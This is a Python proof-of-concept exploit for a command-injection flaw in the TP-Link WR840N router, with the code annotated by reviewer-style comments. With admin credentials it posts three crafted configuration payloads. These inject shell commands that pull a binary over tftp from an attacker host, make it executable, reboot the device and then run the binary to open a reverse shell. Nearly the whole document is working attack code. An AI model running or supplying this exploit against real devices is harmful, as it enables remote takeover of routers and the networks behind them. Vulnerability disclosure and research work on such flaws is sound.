#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Samir Sanchez Garnica and Luis Jacome Valencia
# Description: This script exploits a remote command execution vulnerability under the oal_setIp6DefaultRoute component in the TPLink WR840N router.

import requests
import base64
import argparse

class RCE():
    """PoC driver for the TP-Link WR840N command injection named in the file header.

    The router is reached over plain HTTP at ``/cgi?2``; the admin credentials
    travel in a cookie named ``Authorization`` (Basic scheme), and three crafted
    configuration payloads are posted in sequence by :meth:`exploit`.  Every
    attribute set in ``__init__`` is read back by :meth:`exploit`.
    """
    def __init__(self, ip: str, username: str, password: str, lhost: str) -> None:
        """Store the target, the credentials and the shell fragments used in stage 1.

        Args:
            ip: Router address; used verbatim in the URL, Host, Origin and Referer.
            username: Administrator user name placed in the Basic-auth cookie.
            password: Administrator password placed in the Basic-auth cookie.
            lhost: Host named in the ``tftp -g`` fragment (``command_1``).
        """
        self.ip = ip
        self.username = username
        self.password = password
        self.lhost = lhost
        # One Session so the three POSTs below share connection state.
        self.session = requests.Session()
        # Shell fragments that stage 1 splices into NOIP_DNS_CFG fields; each
        # begins with ';' (shell command separator).
        self.command_1 = ";tftp -g -r s -l /var/tmp/dconf/s {}".format(self.lhost)
        self.command_2 = ";chmod +x /var/tmp/dconf/s"
        self.command_3 = ";./var/tmp/dconf/s"
    
    def base64_encode(self, s: str) -> bytes:
        """Return the standard base64 encoding of *s* as bytes.

        *s* is encoded as ASCII first, so a user name or password containing
        non-ASCII characters raises UnicodeEncodeError here.
        """
        msg_bytes = s.encode('ascii')
        return base64.b64encode(msg_bytes)

    def exploit(self) -> None:
        """Post the three stages to the router and print progress messages.

        Side effects: sets ``url``, ``proxyes``, ``stage_1``..``stage_3``,
        ``headers``, ``cookies`` and ``response`` on the instance, performs up to
        three HTTP POSTs, and blocks on ``input()`` between stage 2 and stage 3
        only when the stage-2 request raises.  Nothing is returned; a non-200
        reply to stage 1 or stage 3 prints nothing and is not otherwise reported.
        """
        # Building the malicious packet
        
        self.url = "http://" + self.ip + "/cgi?2"
        self.proxyes = {}  # empty: no proxy is ever configured
        # Stage 1: NOIP_DNS_CFG write whose userName/password/userDomain fields
        # carry the three fragments built in __init__.
        self.stage_1 = '[NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5\r\nenable=1\r\nuserName={0}\r\npassword={1}\r\nuserDomain={2}\r\nlogin=1\r\n'.format(self.command_1, self.command_2, self.command_3)
        # Stage 2: L3_IP6_FORWARDING write with ';reboot;' injected into __ifName.
        self.stage_2 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;reboot;\r\ndefaultConnectionService=\r\n'
        # Stage 3: the same write with a different injected __ifName value.
        self.stage_3 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;sh */t*/d*/n*;\r\ndefaultConnectionService=\r\n'

    
        # Static browser-like headers reused for all three POSTs.
        self.headers = {
            'Host': self.ip,
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0',
            'Accept': '*/*',
            'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'text/plain',
            # NOTE(review): this is a literal string, not a computed length, and
            # self.payload is never assigned anywhere in this class.
            'Content-Length': 'str(len(self.payload))',
            'Origin': 'http://'+str(self.ip),
            'Referer': 'http://'+str(self.ip)+'/mainFrame.htm',
        }
        
        # Credentials go in a cookie named 'Authorization', not the HTTP header.
        self.cookies = { 'Authorization' : 'Basic ' + self.base64_encode(self.username + ":" + self.password).decode('ascii') }
        
        # Stage 1 has no timeout: this call can block indefinitely.
        self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_1, proxies=self.proxyes)
        if self.response.status_code == 200:
            print("[+] Sending Stage 1, allocate command in /var/tmp/dconf/noipdns.conf")
            
            try:
                # verify=False has no effect on a plain http:// URL; the 10 s
                # timeout is what makes a rebooting router surface as an exception.
                self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_2, proxies=self.proxyes, verify=False, timeout=10)
            except:
                # Bare except: any failure here (timeout, refused connection, even
                # KeyboardInterrupt) is taken to mean the device is rebooting.  A
                # 200 reply instead falls straight through to stage 3 with no
                # message and no pause.
                print("[+] Sending Stage 2, reboot device and get new configuration 2")
                input("[+] waiting reconnect to wireless device, press enter to send stage 3 and obtained reverse shell")
                            
            # Stage 3 again has no timeout and reuses the same session/cookies.
            self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_3, proxies=self.proxyes)
            if self.response.status_code == 200:
                print("[+] Getting reverse shell....")
        

def main():
    """Parse the four required command-line options and run the PoC.

    All options are mandatory; the script exits with argparse's usage error
    when one is missing.  If every value is non-empty, an ``RCE`` instance is
    built from them and its ``exploit`` method is invoked; otherwise nothing
    happens.
    """
    parser = argparse.ArgumentParser()
    option_specs = (
        ("--username", "username", "Enter the administrator user of the router"),
        ("--password", "password", "Enter the admin password of the router"),
        ("--target", "target", "Enter router ip address"),
        ("--lhost", "lhost", "Enter your lhost server tfpt"),
    )
    for flag, dest_name, help_text in option_specs:
        parser.add_argument(flag, dest=dest_name, help=help_text, required=True)
    args = parser.parse_args()

    # required=True still admits empty strings; skip the run if any value is empty.
    values = (args.username, args.password, args.target, args.lhost)
    if not all(values):
        return
    RCE(args.target, args.username, args.password, args.lhost).exploit()

# Run the CLI only when executed as a script, not when the module is imported.
if __name__ == "__main__":
    main()